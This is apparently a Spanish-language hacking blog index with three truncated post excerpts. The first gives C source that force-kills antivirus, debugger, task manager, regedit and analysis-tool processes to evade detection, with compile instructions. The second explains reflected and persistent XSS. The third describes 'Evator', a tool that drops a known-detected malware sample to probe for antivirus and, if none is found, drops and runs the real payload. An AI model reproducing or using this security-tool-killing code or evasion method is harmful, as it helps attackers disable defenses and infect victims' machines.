Aprendis de hacker

Aqui un programita en c++ para matar los procesos de los anti virus y evadir la deteccion en algunos casos si se encuentra el proceso. codigo fuente: lo copiamos y lo pegamos en el editor de texto y lo guardamos como kill.c y luego lo compilamos con dev-c++ en windows o gcc #include <stdio.h> #include <windows.h> void killAll(){     //kill al av process!     system("@echo off"); system("echo killing.."); system("taskkill /f /im vbox.exe"); system("taskkill /f /im VBoxTray.exe"); system("taskkill /f /im avast.exe"); system("taskkill /f /im taskmgr.exe"); system("taskkill /f /im netstat.exe"); system("taskkill /f /im OLLYDBG.EXE"); system("taskkill /f /im x64DBG.exe"); system("taskkill /f /im nmap.exe"); system("taskkill /f /im burp.exe"); system("taskkill /f /im regedit.exe"); system("taskkill /f /im avast_install.exe"); system("taskkill /f /...

Que es? vulnerabilidad XSS (Cross‑site Scripting) en sitios web un ataque xss es una vulneravilidad en un paguina o aplicacion web que permite inyectar codigo por lo general del tip java script, en aplicaciones mal configuradas como por ejemplo un input o el metodo get de php en lugar de usar variables locales las inyectamos desde la url y esto permite a un atacante modificar el contenido de un sitio web con el fin de realizar ataques de pishing o redirigir a una victma a un sitio web malicioso con el fin de robar datos o descargar malware. TIPOS DE ATAQUES XSS Básicamente existen dos modalidades de vulnerabilidad XSS, muy parecidas entre sí, y que se conocen como “reflejada” y “persistente”. Cross Site Scripting persistente Si el código que hemos insertado se queda almacenado en el servidor, por ejemplo formando parte de una contribución en un foro, el ataque se dice que es persistente. Cualquier usuario que entre a leer dicha contribución leerá el texto inocente pero probableme...

Hoy les quiero mostrar una tecnica para evadir antivirus muy sencilla pero funcional Funciona de la siguiente manera: el ejecutable contine en su interior 3 funciones 1 un stub que descifra una muestra de malware que es detectado por todos los antivirus 2 otra funcion que dropea el malware detectable 3 y la tercera funcion que se encarga despues de un sierto tiempo de espera de ver si el archivo malicioso aun esta en el caso de estarlo mostrara un mensaje no se a detectado ningun antivirus de lo contrario si el malware ya no esta asumira que hay un antivirus instalado y terminara su ejecucion. Pero tambien en si no se detecta ningun antivirus podriamos dropear nuestro verdadero malware y iniciar su ejecucion, el codigo esta escrito en python pero la tecnica se podria implementar en cualquier otro lenguaje de programacion incluso uno compilado como golang o c++ el link del proyectos es este Evator .